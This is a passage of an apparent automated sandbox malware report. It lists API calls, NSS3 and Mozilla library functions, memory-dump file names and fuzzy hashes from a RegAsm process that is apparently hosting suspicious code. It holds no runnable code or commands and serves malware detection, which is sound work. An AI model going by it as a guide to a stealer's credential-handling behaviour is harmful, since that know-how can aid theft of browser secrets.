                                                                                                          • Part of subcall function 6C20B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C2E18D0,?), ref: 6C20B095
                                                                                                        • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C1B3FFF), ref: 6C1BAE3C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 2372449006-0
                                                                                                        • Opcode ID: 9cf4d1e6206dc4e6f1741556c89cb47fb8a75879e6bfcb6762accc0cda5566ee
                                                                                                        • Instruction ID: ec9ab94733a43c1b38e08a7ee5d1035eb8084b7a83ee28e651ec1890ae6b5d83
                                                                                                        • Opcode Fuzzy Hash: 9cf4d1e6206dc4e6f1741556c89cb47fb8a75879e6bfcb6762accc0cda5566ee
                                                                                                        • Instruction Fuzzy Hash: A8112961F0020C5BE7109B659C41BBF73FC9F6564DF044129FC15A6A41FB70E558C6E2
                                                                                                        Function 6C1D8E80 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PK11_GetInternalKeySlot.NSS3(?,?,?,6C1F2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C1C4F1C), ref: 6C1D8EA2
                                                                                                          • Part of subcall function 6C1FF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C1FF854
                                                                                                          • Part of subcall function 6C1FF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C1FF868
                                                                                                          • Part of subcall function 6C1FF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C1FF882
                                                                                                          • Part of subcall function 6C1FF820: free.MOZGLUE(04C483FF,?,?), ref: 6C1FF889
                                                                                                          • Part of subcall function 6C1FF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C1FF8A4
                                                                                                          • Part of subcall function 6C1FF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C1FF8AB
                                                                                                          • Part of subcall function 6C1FF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C1FF8C9
                                                                                                          • Part of subcall function 6C1FF820: free.MOZGLUE(280F10EC,?,?), ref: 6C1FF8D0
                                                                                                        • PK11_IsLoggedIn.NSS3(?,?,?,6C1F2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C1C4F1C), ref: 6C1D8EC3
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,6C1F2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C1C4F1C), ref: 6C1D8EDC
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,6C1F2E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C1D8EF1
                                                                                                        • PR_Unlock.NSS3 ref: 6C1D8F20
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 1978757487-0
                                                                                                        • Opcode ID: f2e2ca2d7b0c9b06f3a7e0a406deed94bec62964ac98c3279f96d485d5bca74d
                                                                                                        • Instruction ID: a57838d7b47f0668a20a6108ff2f71cf77244deb547d72635fd1d510ad6bc3cc
                                                                                                        • Opcode Fuzzy Hash: f2e2ca2d7b0c9b06f3a7e0a406deed94bec62964ac98c3279f96d485d5bca74d
                                                                                                        • Instruction Fuzzy Hash: F3217C71A09605AFD700AF29D484299BBF4FF48318F02556EEC989BB40D730F854CBD2
                                                                                                        Function 00425713 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _freemalloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 3576935931-0
                                                                                                        • Opcode ID: feda3816294fd9af8db34316e038ce1953c349d56468ddbca55d0205ef3a299f
                                                                                                        • Instruction ID: b76dc663818b464284d97c71afdab2e33c7188303a79513cbdb4af8dfc28d3f2
                                                                                                        • Opcode Fuzzy Hash: feda3816294fd9af8db34316e038ce1953c349d56468ddbca55d0205ef3a299f
                                                                                                        • Instruction Fuzzy Hash: CB112732B40A31EBCF216F79BC0575A37A5AF803B5F60403FF8498A250DE7C8980969C
                                                                                                        Function 6C208800 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(?,6C21085A,00000000,?,6C1B8369,?), ref: 6C208821
                                                                                                        • TlsGetValue.KERNEL32(?,?,6C21085A,00000000,?,6C1B8369,?), ref: 6C20883D
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,6C21085A,00000000,?,6C1B8369,?), ref: 6C208856
                                                                                                        • PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C208887
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,6C21085A,00000000,?,6C1B8369,?), ref: 6C208899
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07AD
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07CD
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07D6
                                                                                                          • Part of subcall function 6C1A07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C13204A), ref: 6C1A07E4
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,6C13204A), ref: 6C1A0864
                                                                                                          • Part of subcall function 6C1A07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C1A0880
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,6C13204A), ref: 6C1A08CB
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(?,?,6C13204A), ref: 6C1A08D7
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(?,?,6C13204A), ref: 6C1A08FB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 2759447159-0
                                                                                                        • Opcode ID: 54984e51604e1ceb1add44a749351ec1a294bb70f08fa10d35f212c1f0a8e8ad
                                                                                                        • Instruction ID: ef7eb5862ab88bd8412a4b5d63e041cc91067021aac32d4a9f6535e5f19952b1
                                                                                                        • Opcode Fuzzy Hash: 54984e51604e1ceb1add44a749351ec1a294bb70f08fa10d35f212c1f0a8e8ad
                                                                                                        • Instruction Fuzzy Hash: 21214CB5A0460E8FDB00AF78C5886AABBB4FF05309F10466BDC9496645E730D595CB92
                                                                                                        Function 6C1D28A0 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,6C1C80DD), ref: 6C1D28BA
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,6C1C80DD), ref: 6C1D28D3
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6C1C80DD), ref: 6C1D28E8
                                                                                                        • DeleteCriticalSection.KERNEL32(?,?,?,?,?,6C1C80DD), ref: 6C1D290E
                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,6C1C80DD), ref: 6C1D291A
                                                                                                          • Part of subcall function 6C1C9270: DeleteCriticalSection.KERNEL32(?,?,6C1D5089,?,6C1D3B70,?,?,?,?,?,6C1D5089,6C1CF39B,00000000), ref: 6C1C927F
                                                                                                          • Part of subcall function 6C1C9270: free.MOZGLUE(?,?,6C1D3B70,?,?,?,?,?,6C1D5089,6C1CF39B,00000000), ref: 6C1C9286
                                                                                                          • Part of subcall function 6C1C9270: PL_HashTableDestroy.NSS3(?,6C1D3B70,?,?,?,?,?,6C1D5089,6C1CF39B,00000000), ref: 6C1C9292
                                                                                                          • Part of subcall function 6C1C8B50: TlsGetValue.KERNEL32(00000000,?,6C1D0948,00000000), ref: 6C1C8B6B
                                                                                                          • Part of subcall function 6C1C8B50: EnterCriticalSection.KERNEL32(?,?,?,6C1D0948,00000000), ref: 6C1C8B80
                                                                                                          • Part of subcall function 6C1C8B50: PL_FinishArenaPool.NSS3(?,?,?,?,6C1D0948,00000000), ref: 6C1C8B8F
                                                                                                          • Part of subcall function 6C1C8B50: PR_Unlock.NSS3(?,?,?,?,6C1D0948,00000000), ref: 6C1C8BA1
                                                                                                          • Part of subcall function 6C1C8B50: DeleteCriticalSection.KERNEL32(?,?,?,?,6C1D0948,00000000), ref: 6C1C8BAC
                                                                                                          • Part of subcall function 6C1C8B50: free.MOZGLUE(?,?,?,?,?,6C1D0948,00000000), ref: 6C1C8BB8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$Deletefree$EnterUnlockValue$ArenaDestroyFinishHashPoolTable
                                                                                                        • String ID:
                                                                                                        • API String ID: 3225375108-0
                                                                                                        • Opcode ID: b42e9718eda366a768f80406bb59d098a7e56fe7b36bed0b9214c791247bb46d
                                                                                                        • Instruction ID: 15da8bb8195d65c7b08db4f444516e8bfb29d305a8570211281371671eb540d6
                                                                                                        • Opcode Fuzzy Hash: b42e9718eda366a768f80406bb59d098a7e56fe7b36bed0b9214c791247bb46d
                                                                                                        • Instruction Fuzzy Hash: 792139B5A04A158FDB00BF78C088569BBF4FF15314F024969ECD597B00E734E899CB92
                                                                                                        Function 6C1C8FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6C1D0710), ref: 6C1C8FF1
                                                                                                        • PR_CallOnce.NSS3(6C312158,6C1C9150,00000000,?,?,?,6C1C9138,?,6C1D0710), ref: 6C1C9029
                                                                                                        • calloc.MOZGLUE(00000001,00000000,?,?,6C1D0710), ref: 6C1C904D
                                                                                                        • memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6C1D0710), ref: 6C1C9066
                                                                                                        • PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6C1D0710), ref: 6C1C9078
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateThread$CallOncecallocmemcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 1176783091-0
                                                                                                        • Opcode ID: 3677830891aa24cc2b0b24e39f7353069e918d15abd46fc494492d5a1d140310
                                                                                                        • Instruction ID: 27a9ba4cb2b9af22767a55d2eda2f2ff7957c5d61578e73e83b38889995162ee
                                                                                                        • Opcode Fuzzy Hash: 3677830891aa24cc2b0b24e39f7353069e918d15abd46fc494492d5a1d140310
                                                                                                        • Instruction Fuzzy Hash: 131144717001115BEB201AA9AC55A6A76ACEBA27ACF100131FC88C6F41F31BCD7583F7
                                                                                                        Function 6C1DCD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C1F1E10: TlsGetValue.KERNEL32 ref: 6C1F1E36
                                                                                                          • Part of subcall function 6C1F1E10: EnterCriticalSection.KERNEL32(?,?,?,6C1CB1EE,2404110F,?,?), ref: 6C1F1E4B
                                                                                                          • Part of subcall function 6C1F1E10: PR_Unlock.NSS3 ref: 6C1F1E76
                                                                                                        • free.MOZGLUE(?,6C1DD079,00000000,00000001), ref: 6C1DCDA5
                                                                                                        • PK11_FreeSymKey.NSS3(?,6C1DD079,00000000,00000001), ref: 6C1DCDB6
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C1DD079,00000000,00000001), ref: 6C1DCDCF
                                                                                                        • DeleteCriticalSection.KERNEL32(?,6C1DD079,00000000,00000001), ref: 6C1DCDE2
                                                                                                        • free.MOZGLUE(?), ref: 6C1DCDE9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                                        • String ID:
                                                                                                        • API String ID: 1720798025-0
                                                                                                        • Opcode ID: 6d1ae78ab87df1f2f8f18d67f4fe2201c63345bbfe5ac2e1eba696d51370edc2
                                                                                                        • Instruction ID: 654899fda47af5b1a2430b82fea59f5519b440f82259b76268369b10a2d53d2e
                                                                                                        • Opcode Fuzzy Hash: 6d1ae78ab87df1f2f8f18d67f4fe2201c63345bbfe5ac2e1eba696d51370edc2
                                                                                                        • Instruction Fuzzy Hash: 9611CEB2B01616ABDB00AE69EC45E97B77CFF142687110532E91987E01E732F434CBE2
                                                                                                        Function 6C242CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C245B40: PR_GetIdentitiesLayer.NSS3 ref: 6C245B56
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C242CEC
                                                                                                          • Part of subcall function 6C25C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C25C2BF
                                                                                                        • PR_EnterMonitor.NSS3(?), ref: 6C242D02
                                                                                                        • PR_EnterMonitor.NSS3(?), ref: 6C242D1F
                                                                                                        • PR_ExitMonitor.NSS3(?), ref: 6C242D42
                                                                                                        • PR_ExitMonitor.NSS3(?), ref: 6C242D5B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 1593528140-0
                                                                                                        • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                        • Instruction ID: a4cfc603d96670a409cc75aac32b71abbae7c52cfbb55809bc327171c94ee2d8
                                                                                                        • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                        • Instruction Fuzzy Hash: 7D01A1F5A10308ABE6319E26FC44A87B7B5EB55718F008525EC5AC6720E632E82586A2
                                                                                                        Function 6C242D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C245B40: PR_GetIdentitiesLayer.NSS3 ref: 6C245B56
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C242D9C
                                                                                                          • Part of subcall function 6C25C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C25C2BF
                                                                                                        • PR_EnterMonitor.NSS3(?), ref: 6C242DB2
                                                                                                        • PR_EnterMonitor.NSS3(?), ref: 6C242DCF
                                                                                                        • PR_ExitMonitor.NSS3(?), ref: 6C242DF2
                                                                                                        • PR_ExitMonitor.NSS3(?), ref: 6C242E0B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 1593528140-0
                                                                                                        • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                        • Instruction ID: c0be6a8d2282a49bb7db265241fcddcf9657ca379ea31ce93b1e0913dc650a0f
                                                                                                        • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                        • Instruction Fuzzy Hash: 5B01A5F5A106089FE6359E26FC45FC7B7B5EB41318F008435EC9AC6B10D632F42586A2
                                                                                                        Function 6C1DAE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C1C3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C1DAE42), ref: 6C1C30AA
                                                                                                          • Part of subcall function 6C1C3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C1C30C7
                                                                                                          • Part of subcall function 6C1C3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C1C30E5
                                                                                                          • Part of subcall function 6C1C3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C1C3116
                                                                                                          • Part of subcall function 6C1C3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C1C312B
                                                                                                          • Part of subcall function 6C1C3090: PK11_DestroyObject.NSS3(?,?), ref: 6C1C3154
                                                                                                          • Part of subcall function 6C1C3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1C317E
                                                                                                        • SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C1B99FF,?,?,?,?,?,?,?,?,?,6C1B2D6B,?), ref: 6C1DAE67
                                                                                                        • SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C1B99FF,?,?,?,?,?,?,?,?,?,6C1B2D6B,?), ref: 6C1DAE7E
                                                                                                        • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C1B2D6B,?,?,00000000), ref: 6C1DAE89
                                                                                                        • PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C1B2D6B,?,?,00000000), ref: 6C1DAE96
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C1B2D6B,?,?), ref: 6C1DAEA3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
                                                                                                        • String ID:
                                                                                                        • API String ID: 754562246-0
                                                                                                        • Opcode ID: dd6c142831816dfc3986e8b03e1a9ff391d6d0409b79fffb920c49dcb1e7404d
                                                                                                        • Instruction ID: ddf5a6ef7dfbe74cb5c6a24141a7677fe58afd0068837eca90572d00907f87ac
                                                                                                        • Opcode Fuzzy Hash: dd6c142831816dfc3986e8b03e1a9ff391d6d0409b79fffb920c49dcb1e7404d
                                                                                                        • Instruction Fuzzy Hash: 0E01F467B4015157E701D22CAC95BEB31588BA7A5CF0B0032F805C7B41FA1AE909C2E3
                                                                                                        Function 6C2C0930 Relevance: 7.5, APIs: 5, Instructions: 45fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000,?,6C2C0C83), ref: 6C2C094F
                                                                                                        • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C2C0C83), ref: 6C2C0974
                                                                                                        • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C2C0983
                                                                                                        • _PR_MD_UNLOCK.NSS3(?,?,6C2C0C83), ref: 6C2C099F
                                                                                                        • OutputDebugStringA.KERNEL32(?,?,6C2C0C83), ref: 6C2C09B2
                                                                                                        Memory Dump Source
